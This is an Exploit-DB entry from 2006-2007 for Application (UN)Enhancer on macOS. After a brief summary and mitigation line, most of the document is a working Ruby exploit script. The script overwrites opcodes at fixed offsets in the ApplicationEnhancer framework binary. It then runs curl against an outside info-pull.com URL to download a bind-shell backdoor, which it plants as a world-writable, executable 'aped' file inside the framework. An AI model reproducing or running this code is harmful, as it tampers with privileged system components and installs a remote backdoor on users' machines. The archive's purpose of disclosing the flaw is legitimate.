Exploit Of The Apes

vendor:

Application (UN)Enhancer

by:

LMH and Johnny Pwnerseed

7.5

CVSS

HIGH

Application (UN)Enhancer

CWE

Product Name: Application (UN)Enhancer

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2006

This is a practical pwnage exploit for Application (UN)Enhancer, also known as APU. The exploit involves patching certain opcodes in the binary file of the framework to gain unauthorized access and control. The exploit targets the ApplicationEnhancer.framework and ApplicationUnenhancer.framework.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Application (UN)Enhancer or remove the framework entirely from the system.

Source

Exploit-DB raw data:

# !/usr/bin/ruby
# Exploit Of The Apes: A practical pwnage for Application (UN)Enhancer aka APU
# (c) 2006 LMH <lmh [at] info-pull.com> and Johnny Pwnerseed.
#
# This goes dedicated to #macdev. For the childish flaming and great brain lag.
#
# Lesson: Don't talk about stuff you have NFC about. And don't insult
# people. Once you do it, and get pwned, total lulz ensues ;o(
#
# MD5 (ApplicationEnhancer) = cf9bf1fa74f8298f09aedce38c72a7da
# at offset 27512   0x807d0014      ->  0x38600000
# at offset 115586  0x8b4614890424  ->  0x31c090890424
# 

require 'fileutils'

# Define offsets to opcodes to be patched
PATCH_INSTRUCTIONS =  [
                        [ 27512,  "\x38\x60\x00\x00"         ],
                        [ 115586, "\x31\xc0\x90\x89\x04\x24" ]
                      ]

BACKDOO_URL = "http://projects.info-pull.com/moab/bug-files/sample-back" # must be fat binary, sample bind shell
PATH_TO_APE = "/Library/Frameworks/ApplicationEnhancer.framework"
PATH_TO_APU = "/Library/Frameworks/ApplicationUnenhancer.framework"

path_to_bozo  = (ARGV[0] || File.join(PATH_TO_APE,"Versions/Current/ApplicationEnhancer"))

puts "++ Starting: #{PATH_TO_APE}"
puts "++ Back-up:  #{PATH_TO_APU}"
# Move the original framework to back-up, copy contents back, set permissions.
# To repair:
# rm -rf /Library/Frameworks/ApplicationEnhancer.framework
# mv /Library/Frameworks/ApplicationUnenhancer.framework \
# /Library/Frameworks/ApplicationEnhancer.framework
if File.exists?(PATH_TO_APE)
  unless File.exists?(PATH_TO_APU)
    FileUtils.mv(PATH_TO_APE, PATH_TO_APU)
    FileUtils.cp_r(PATH_TO_APU, PATH_TO_APE)
    system "chmod u+w #{File.join(PATH_TO_APE, "Versions/A/ApplicationEnhancer")}"
  end
end

# Patching poor Apu (we could just replace the binary, but this is cooler as the
# guys at Unsanity, LLC think they can dropriv and forget all about flawed code...).
bozo    = File.read(path_to_bozo)

puts "++ Patch: #{path_to_bozo}"
PATCH_INSTRUCTIONS.each do |patch|
  offset  = patch[0] # start offset
  bindata = patch[1] # patch bytes
  bcount  = 0

  puts "++ Patching stage: offset=#{offset} patch size=#{bindata.size}"
  bindata.split(//).each do |patch_byte|
    target_offset = offset + bcount
    printf "++ Patching byte at %x\n", target_offset
    bozo[target_offset] = patch_byte
    bcount += 1
  end
end

puts "++ Binary pwnage done. Writing patched data..."
u_bozo = File.new(File.join(PATH_TO_APE, "/Versions/A/ApplicationEnhancer"), "w")
u_bozo.write(bozo)
u_bozo.close
puts "++ Done (#{bozo.size} bytes). Planting backdoor aped binary..."

aped_path = File.join(PATH_TO_APE, "Resources/aped")
system "chmod a+rxw #{aped_path}" # let everyone backdoor it afterwards, be social and share!
system "curl #{BACKDOO_URL} -o #{aped_path}"
system "chmod a+x #{aped_path}"

puts "++ Finished."

# milw0rm.com [2007-01-08]